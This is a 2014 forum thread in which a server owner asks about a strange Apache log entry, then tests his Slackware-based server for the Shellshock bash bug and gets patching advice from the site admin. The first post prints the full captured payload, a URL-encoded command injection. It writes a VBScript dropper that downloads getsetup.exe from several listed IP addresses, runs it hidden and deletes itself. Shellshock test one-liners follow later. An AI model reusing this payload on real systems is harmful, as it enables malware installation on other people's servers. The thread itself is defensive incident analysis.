| View previous topic :: View next topic |
| Author |
Message |
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
 Posted: Thu Sep 25, 2014 9:05 pm Post subject: Strange log in apache |
 |
|
Hi,
today I noticed the strangest log note in /var/log/httpd/access_log:
| Code: | | "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 2363 |
To me it seems like a hack attempt? What worries is that Apache seems to have handled it as a legitimate request? -In part it doesn't seem to be harmful in my SMS-server that is not built on M$-software, but I'm not certain..
I found some searchresults like http://security.stackexchange.com/questions/68035/is-this-new-hack-attempt-something-to-worry-about and that call it an injection attack, but I couldn't validate the replies.
Have you seen anything similar? Or know what it is?
Regards
Lars
140926: Some additional information:
Also found this link: http://forums.iis.net/t/1217448.aspx?Interesting+exploit+attempt+
related to Microsoft IIS server.
A whois on the request address gave: It came from China, the IP:s in the command came somewhat confusingly from Hong Kong and USA, Portugal, Paris.
A nmap on the request IP gave: All 1000 scanned ports on 122.228.207.244 are filtered
Tried to check what processes are running, but they are quite a few and I cannot say which of them normally were running? -I could not identify anything especially suspicious though.
Finally I checked that no new files had been created (on the other hand the request ended with: "DeleteFile...."
The links I found all were from after 20th september this year.
-Sent a question to my ISP and my DNS-service that also runs a Web hotel: None of them had seen anything similar and knew what the request adressed? Both suggested me to contact this forum. |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
|
| Back to top |
|
gerasimos_h
Site Admin
Joined: 09 Aug 2007
Posts: 1757
Location: Greece
|
| Posted: Fri Sep 26, 2014 8:33 pm Post subject: |
|
|
I doubt it, as the script tries to run .exe and .vbs which are windows executables, and most likely the vulnerability doesn't exist anyway in our web server...
Didn't have time to examine the thread though, but I don't see it as serious...
gerasimos_h
_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Last edited by gerasimos_h on Sat Sep 27, 2014 10:23 am; edited 1 time in total |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Sat Sep 27, 2014 9:21 am Post subject: |
|
|
Thank you gerasimos!!
Lars |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Sat Sep 27, 2014 11:48 am Post subject: |
|
|
An additional comment:
I agree with you about the Windows typical commands, that was also my first thoughts, but I wasn't sure  .
But since a friend posted me about the linux/MacOS bash bug I ran the tests described in the link above against my server:
http://shellshock.brandonpotter.com/
http://www.shellshocktest.com/
http://bashsmash.ccsir.org/
and found that my SMS-1.6.0 server probably isn't vulnerable to the linux bash bug.
Bash however in SMS-1.6.0 (Slackware13.37) seems to be vulnerable to the bash bug, tested with
| Code: | $ env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
$ env X="() { :;} ; echo busted" `which bash` -c "echo completed"
$ env x='() { :;}; echo vulnerable' bash -c 'echo hello' |
However I never use SMS-1.6.0 as internet client though.
I also tried bash in my ordinary Slackware 14.0, and it also seems vulnerable to the bash bug.
Regards and Thank you for your comment!
Lars |
|
| Back to top |
|
gerasimos_h
Site Admin
Joined: 09 Aug 2007
Posts: 1757
Location: Greece
|
| Posted: Sat Sep 27, 2014 2:23 pm Post subject: |
|
|
All bash version are vulnerable so you need to update package from SMS-Current or Slackware patches...
Nevertheless SMS and generally slackware servers ain't vulnerable since no shell access is granted to services, neither to user nobody...
It's a shellshock so you need shell access....
So if you don't have a web or any other application that is too "dirty", you don't have problems...
gerasimos_h
_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Sat Sep 27, 2014 6:17 pm Post subject: |
|
|
Thank you again gerasimos for lookin in to it!
I'll update my bash!
Regards
Lars |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Sun Sep 28, 2014 7:55 pm Post subject: |
|
|
A final question after unrigging my vessel
Will the bash-4.3.025-i486-2.txz from SMS-Current be compatible with the 13.37 software in S*M*S-1.6.0?
As you say and some searching revealed (f.i. https://zinetik.com/fix-bash-failure-step-step/), there is still no bug free version.
Perhaps I should wait till there is one?
Regards
Lars |
|
| Back to top |
|
gerasimos_h
Site Admin
Joined: 09 Aug 2007
Posts: 1757
Location: Greece
|
| Posted: Mon Sep 29, 2014 12:30 am Post subject: |
|
|
Yes it will be compatible, you can always check it on yout virtuabox first.. 
Also from slackware-current, available in SMS too...
| Code: | a/bash-4.3.026-i486-1.txz: Upgraded.
This is essentially a rebuild as the preliminary patch for CVE-2014-7169
has been accepted by upstream and is now signed. This also bumps the
patchlevel, making it easy to tell this is the fixed version.
Possibly more changes to come, given the ongoing discussions on oss-sec. |
gerasimos_h
_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Mon Sep 29, 2014 10:47 am Post subject: |
|
|
Of course gerasimos, I've got my *.ova  !
Was a bit tired when I wrote yesterday night.
I'll deal with it after the dry dockings next weekend!
Many thanks again!
Lars |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
|
| Back to top |
|
gerasimos_h
Site Admin
Joined: 09 Aug 2007
Posts: 1757
Location: Greece
|
| Posted: Fri Oct 03, 2014 6:39 am Post subject: |
|
|
Sure no problem, patches applied to those packages as well...
For what is worth, I upgrade recently a slackware-11 installation with bash from slackware-13...
gerasimos_h
_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com |
|
| Back to top |
|
Lars
Senior Member
Joined: 25 Oct 2010
Posts: 136
|
| Posted: Fri Oct 03, 2014 11:07 am Post subject: |
|
|
| Quote: | | For what is worth, I upgrade recently a slackware-11 installation with bash from slackware-13... |
Of course it's worth something for me who's not so advanced or experienced !
Thank you gerasimos!
Lars |
|
| Back to top |
|
|
